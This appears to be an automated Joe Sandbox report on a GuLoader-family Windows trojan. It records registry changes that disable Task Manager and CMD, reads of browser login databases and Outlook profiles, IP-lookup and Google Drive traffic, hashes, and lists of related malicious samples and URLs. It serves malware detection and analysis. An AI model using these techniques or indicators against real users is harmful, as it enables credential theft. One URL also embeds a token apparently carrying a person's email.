        Source: C:\Users\user\Desktop\1258ad6Jpw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_00405DE5 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405DE5
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeRegistry value created: DisableTaskMgr 1Jump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeRegistry value created: DisableCMD 1Jump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: Yara matchFile source: 00000003.00000002.2134875649.0000000034B36000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: 1258ad6Jpw.exe PID: 4664, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        11
        Masquerading
        1
        OS Credential Dumping
        211
        Security Software Discovery
        Remote Services1
        Email Collection
        21
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
        Process Injection
        2
        Virtualization/Sandbox Evasion
        LSASS Memory2
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        31
        Disable or Modify Tools
        Security Account Manager1
        System Network Configuration Discovery
        SMB/Windows Admin Shares1
        Data from Local System
        2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Access Token Manipulation
        NTDS2
        File and Directory Discovery
        Distributed Component Object Model1
        Clipboard Data
        13
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Process Injection
        LSA Secrets215
        System Information Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Deobfuscate/Decode Files or Information
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        1258ad6Jpw.exe72%VirustotalBrowse
        1258ad6Jpw.exe62%ReversingLabsWin32.Trojan.Guloader
        1258ad6Jpw.exe100%AviraTR/Injector.kjjjr
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsk64CB.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsk64CB.tmp\System.dll0%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        142.250.184.238
        truefalse
          high
          drive.usercontent.google.com
          142.250.185.97
          truefalse
            high
            reallyfreegeoip.org
            104.21.16.1
            truefalse
              high
              checkip.dyndns.com
              158.101.44.242
              truefalse
                high
                checkip.dyndns.org
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  http://checkip.dyndns.org/false
                    high
                    https://reallyfreegeoip.org/xml/8.46.123.189false
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.google.com1258ad6Jpw.exe, 00000003.00000003.1394064569.00000000042E8000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://nsis.sf.net/NSIS_Error1258ad6Jpw.exefalse
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189l1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://checkip.dyndns.comd1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://drive.google.com/1258ad6Jpw.exe, 00000003.00000002.2115845591.000000000429D000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://reallyfreegeoip.orgd1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://reallyfreegeoip.org/xml/8.46.123.189d1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://reallyfreegeoip.org1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://checkip.dyndns.orgd1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://reallyfreegeoip.org1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.google.com1258ad6Jpw.exe, 00000003.00000002.2115845591.00000000042B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://drive.usercontent.google.com/1258ad6Jpw.exe, 00000003.00000002.2115845591.00000000042DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://checkip.dyndns.org1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A4A000.00000004.00000800.00020000.00000000.sdmp, 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://apis.google.com1258ad6Jpw.exe, 00000003.00000003.1394064569.00000000042E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.com1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://nsis.sf.net/NSIS_ErrorError1258ad6Jpw.exefalse
                                                      high
                                                      http://checkip.dyndns.org/d1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name1258ad6Jpw.exe, 00000003.00000002.2134875649.00000000349E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://reallyfreegeoip.org/xml/1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.21.16.1
                                                            reallyfreegeoip.orgUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            142.250.184.238
                                                            drive.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            158.101.44.242
                                                            checkip.dyndns.comUnited States
                                                            31898ORACLE-BMC-31898USfalse
                                                            142.250.185.97
                                                            drive.usercontent.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1632353
                                                            Start date and time:2025-03-07 22:42:18 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 39s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:12
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:1258ad6Jpw.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:d953e4ecdd89c5bec7fa20b1d7f43ad83940c3505b9deaaf8dd79247d4178852.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@3/9@4/4
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 94%
                                                            • Number of executed functions: 112
                                                            • Number of non-executed functions: 100
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 23.60.203.209
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            No simulations
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            104.21.16.1g1V10ssekg.exeGet hashmaliciousFormBookBrowse
                                                            • www.sigaque.today/n61y/?UPV=BOlfS7N9ZWkGRIMRgNC6B6+WUTyM673eSjZAzliNIDKZHnAeT7/5dfTbZtimq+dx8K4CQjPcymznAMXPWSrBBYPYz0JSQDMkWzhvpNbFnW2/OcjAWw==&YrV=FlsDgRMx
                                                            0IrTeguWM7.exeGet hashmaliciousFormBookBrowse
                                                            • www.tumbetgirislinki.fit/ftbq/
                                                            Shipping Document.exeGet hashmaliciousFormBookBrowse
                                                            • www.rbopisalive.cyou/6m32/
                                                            Payment Record.exeGet hashmaliciousLokibotBrowse
                                                            • touxzw.ir/sccc/five/fre.php
                                                            Invoice Remittance ref27022558.exeGet hashmaliciousFormBookBrowse
                                                            • www.rbopisalive.cyou/a669/
                                                            ujXpculHYDYhc6i.exeGet hashmaliciousLokibotBrowse
                                                            • touxzw.ir/sss2/five/fre.php
                                                            368c6e62-b031-5b65-fd43-e7a610184138.emlGet hashmaliciousHTMLPhisherBrowse
                                                            • ce60771026585.oakdiiocese.org/p/298?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6
                                                            http://orico-rapaciid.xqyrr.cn/eorico/login/Get hashmaliciousUnknownBrowse
                                                            • orico-rapaciid.xqyrr.cn/favicon.ico
                                                            Order confirmation.exeGet hashmaliciousFormBookBrowse
                                                            • www.englishmaterials.net/3nop/?-Z=cjlpd&Vz=5VQMUr9vdJst/aGqnmtehORilpahgrSgoeoRp4hSLdasMjOC27ijg2BR7Ep4jmwJ4Zkm
                                                            Bank Transfer Accounting Copy.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                            • www.fz977.xyz/48bq/
                                                            158.101.44.242bvhauD4o49.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            0CBJ3aLKx0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            26YzPy68Rz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            O20L0ptxGs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            3c638k0NJx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            YGIVlkbMy7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            TMRASkMVAy.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            AQIu7JYa5r.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            TR3lYZyOE3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            rjRYMApdf9.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            checkip.dyndns.comiFoDComHqT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                            • 193.122.130.0
                                                            cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 132.226.8.169
                                                            axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 132.226.8.169
                                                            bvhauD4o49.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            0CBJ3aLKx0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 158.101.44.242
                                                            26YzPy68Rz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            AEo2XQmxqZ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                            • 132.226.8.169
                                                            l9inNHJqHS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            CWu89IbJQw.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.8.169
                                                            tSftorqHTy.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                            • 132.226.247.73
                                                            reallyfreegeoip.orgiFoDComHqT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                            • 104.21.112.1
                                                            cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 104.21.16.1
                                                            axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 104.21.64.1
                                                            bvhauD4o49.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 104.21.32.1
                                                            0CBJ3aLKx0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 104.21.32.1
                                                            26YzPy68Rz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 104.21.80.1
                                                            AEo2XQmxqZ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                            • 104.21.112.1
                                                            l9inNHJqHS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.112.1
                                                            CWu89IbJQw.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 104.21.112.1
                                                            tSftorqHTy.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                            • 104.21.16.1
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUSiFoDComHqT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                            • 104.21.112.1
                                                            yXsTZ347KJ.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.130.233
                                                            https://www.dottedsign.com/task?code=eyJhbGciOiJIUzUxMiJ9.eyJ0YXNrX2lkIjozNDU1ODM1LCJmaWxlX2lkIjoyMjU3NDQ4Mywic2lnbl9maWxlX2lkIjoyMzE3NTY1OCwic3RhZ2VfaWQiOjQ3MjQ2MTcsImVtYWlsIjoidmZhcmlhc0B3ZXN0bGFrZS5jb20iLCJleHBpcmVkX2F0IjoxNzQxNTUzNDgzfQ.HzZLgMMxAZSV_iVgO--XdcSNVOvVCdiCg8S3aUWMChplsdtgyqOWKyJi3vwVbeBh99sm9EHWsNwj41IZdYNjWAGet hashmaliciousUnknownBrowse
                                                            • 172.65.198.159
                                                            cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 104.21.16.1
                                                            g1V10ssekg.exeGet hashmaliciousFormBookBrowse
                                                            • 188.114.96.3
                                                            axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 104.21.64.1
                                                            jki-dragon-release-online-setup.exeGet hashmaliciousUnknownBrowse
                                                            • 104.17.118.104
                                                            yXsTZ347KJ.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.130.233
                                                            bvhauD4o49.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 104.21.32.1
                                                            0CBJ3aLKx0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 104.21.32.1
                                                            ORACLE-BMC-31898USiFoDComHqT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                            • 193.122.130.0
                                                            bvhauD4o49.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            0CBJ3aLKx0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 158.101.44.242
                                                            26YzPy68Rz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            O20L0ptxGs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            DayVXJx1km.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 193.122.130.0
                                                            NDCNDvC27F.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            3c638k0NJx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 158.101.44.242
                                                            3GrfjMY0pG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 193.122.6.168
                                                            YGIVlkbMy7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            54328bd36c14bd82ddaa0c04b25ed9adiFoDComHqT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                            • 104.21.16.1
                                                            cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 104.21.16.1
                                                            axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 104.21.16.1
                                                            bvhauD4o49.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 104.21.16.1
                                                            0CBJ3aLKx0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 104.21.16.1
                                                            26YzPy68Rz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 104.21.16.1
                                                            AEo2XQmxqZ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                            • 104.21.16.1
                                                            l9inNHJqHS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.16.1
                                                            CWu89IbJQw.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 104.21.16.1
                                                            tSftorqHTy.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                            • 104.21.16.1
                                                            37f463bf4616ecd445d4a1937da06e19ZUY4Nq2SyY.exeGet hashmaliciousGuLoaderBrowse
                                                            • 142.250.184.238
                                                            • 142.250.185.97
                                                            cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 142.250.184.238
                                                            • 142.250.185.97
                                                            axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 142.250.184.238
                                                            • 142.250.185.97
                                                            sR4s2qQF6I.exeGet hashmaliciousGuLoaderBrowse
                                                            • 142.250.184.238
                                                            • 142.250.185.97
                                                            VnaQJI0ScP.exeGet hashmaliciousGuLoaderBrowse
                                                            • 142.250.184.238
                                                            • 142.250.185.97
                                                            bvhauD4o49.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 142.250.184.238
                                                            • 142.250.185.97
                                                            26YzPy68Rz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 142.250.184.238
                                                            • 142.250.185.97
                                                            CWu89IbJQw.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 142.250.184.238
                                                            • 142.250.185.97
                                                            R513Lbg4Qu.exeGet hashmaliciousGuLoaderBrowse
                                                            • 142.250.184.238
                                                            • 142.250.185.97
                                                            R513Lbg4Qu.exeGet hashmaliciousGuLoaderBrowse
                                                            • 142.250.184.238
                                                            • 142.250.185.97
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            C:\Users\user\AppData\Local\Temp\nsk64CB.tmp\System.dllsR4s2qQF6I.exeGet hashmaliciousGuLoaderBrowse
                                                              Payment_Swift Copy_ TXR077901844095342_pdf.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                BANK SLIP_TT COPY 2-13-2024_pdf.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                  INV-2025792 Payment_Summary Ref_4300.exeGet hashmaliciousGuLoaderBrowse
                                                                    INV-2025792 Payment_Summary Ref_4300.exeGet hashmaliciousGuLoaderBrowse
                                                                      Quote-370-UAE-24_pdf.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                        Commercial Offer PVT9864092001-2024_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                          Hydroponically.exeGet hashmaliciousGuLoaderBrowse
                                                                            RFQ Al Geemi_MiddleEast_Project 2025 BOQ.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                              Request for Quotation.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                                Process:C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):11264
                                                                                Entropy (8bit):5.7711167426271945
                                                                                Encrypted:false
                                                                                SSDEEP:192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
                                                                                MD5:3F176D1EE13B0D7D6BD92E1C7A0B9BAE
                                                                                SHA1:FE582246792774C2C9DD15639FFA0ACA90D6FD0B
                                                                                SHA-256:FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
                                                                                SHA-512:0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                Joe Sandbox View:
                                                                                • Filename: sR4s2qQF6I.exe, Detection: malicious, Browse
                                                                                • Filename: Payment_Swift Copy_ TXR077901844095342_pdf.exe, Detection: malicious, Browse
                                                                                • Filename: BANK SLIP_TT COPY 2-13-2024_pdf.exe, Detection: malicious, Browse
                                                                                • Filename: INV-2025792 Payment_Summary Ref_4300.exe, Detection: malicious, Browse
                                                                                • Filename: INV-2025792 Payment_Summary Ref_4300.exe, Detection: malicious, Browse
                                                                                • Filename: Quote-370-UAE-24_pdf.exe, Detection: malicious, Browse
                                                                                • Filename: Commercial Offer PVT9864092001-2024_pdf.exe, Detection: malicious, Browse
                                                                                • Filename: Hydroponically.exe, Detection: malicious, Browse
                                                                                • Filename: RFQ Al Geemi_MiddleEast_Project 2025 BOQ.exe, Detection: malicious, Browse
                                                                                • Filename: Request for Quotation.exe, Detection: malicious, Browse
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):311848
                                                                                Entropy (8bit):7.6875593798526936
                                                                                Encrypted:false
                                                                                SSDEEP:6144:ad3VjstO0TAii/WWmdfeCq40lcPz+m/H0EoXINkuAF:ad3VjstO0Ex/ugLlcPzTH0EmOr+
                                                                                MD5:A6DBA8021145F75869C20E62A05BB501
                                                                                SHA1:B0069FD18DB57FC277C9FAE3C1EACDD25AE9B2F8
                                                                                SHA-256:295F0B043C70D95666E700C212C3702B57E0D4B553D1E9799827E77813B475E5
                                                                                SHA-512:CD2C50C5AD4836EC89B931CE540BEBE20CFDBFBF1F185CBD570305C49362CF421236B34A3B0B15B2D2E5538A38B7CD89B5560BE9B12C0D29EBD2A7D74A121EE9
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:.....'...........................{{{..VV....-.))...........JJ. ...++++..[..BB.,,............................>.99.M..ttt.................A........***..RRRR..$...................................vv......~.....P.....h...q................5...=..\....d......G..$............#.........=.....RR.EE........v...........d....KKK.......K...................^....U.............l.2.....aa.[[[[.....YY.........hh.....................ttt......8..N....`````.00.........................ZZ..........$$.%%............ ................{.VV.111.kkkk.rrr.~~~.............rr..............j..Q...................X.......;.qq.}}}}.........3.....l...........h....ll.0......J.....V.......................EEEE.......@.................|...6................q.W..........<................:............oooooo.A........v..4......gg..II....................k................................5...............L......ZZZ...........((.%%.^^...............BB.....RR..........."..............f................c.........T....5.<......$.........
                                                                                Process:C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):134729
                                                                                Entropy (8bit):4.612292450829367
                                                                                Encrypted:false
                                                                                SSDEEP:1536:ONxcPexIuEixExsZUtROtE4sTBnEwQq9sP3heWckIraJH1lWQpctCvZehFVRLd:ONoevEimCUtk6J6PReLE6QpTZehX
                                                                                MD5:EEF6A68F72261899E0466739548115A6
                                                                                SHA1:A75F288B9892361D553B41A948EC4E16B2F32561
                                                                                SHA-256:2CE4DF66D10327F6F10259E5A03D36C1C291867C03A26D1B31620B81A89B0D81
                                                                                SHA-512:2C92F62B1D0BC03B54139AF08CFAAB89E4151963194ABBF04BB69956B878EE82AF16177B93E5E58BD4A933CB31B031FB6EE6EBCFCA1F589CB1E2933D811886D1
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:.~~~.$.q....o.........................22.....BBB.....................ii................................tt...EEEEEEE.......................444.333...............3.CC....[[.......00.......XXX........................./.........b.HH.............f....a............L.fff..................]]]]]..........@@@@@@@..>>>.......5.~..yy................................ZZZZ.....*.......................*...........99.$....................JJ............"".!!!!.~..9999.......g.................Y.......mm.$..........i...........................................$..Z...................#.f.............[.K.,,...T.................``...+......|..+++..J.. ...........i..i...........T...............44............t.............~.....a......GGG...........8........9999....................^^^^^..........vv.........GGGGG.............................._.GGG....................................................../.........b.........QQ..A.l.;;;;......8.........LL....B...C.II.................t..999.......R..........T.....jj.....
                                                                                Process:C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 650x540, components 3
                                                                                Category:dropped
                                                                                Size (bytes):33551
                                                                                Entropy (8bit):7.956268181390171
                                                                                Encrypted:false
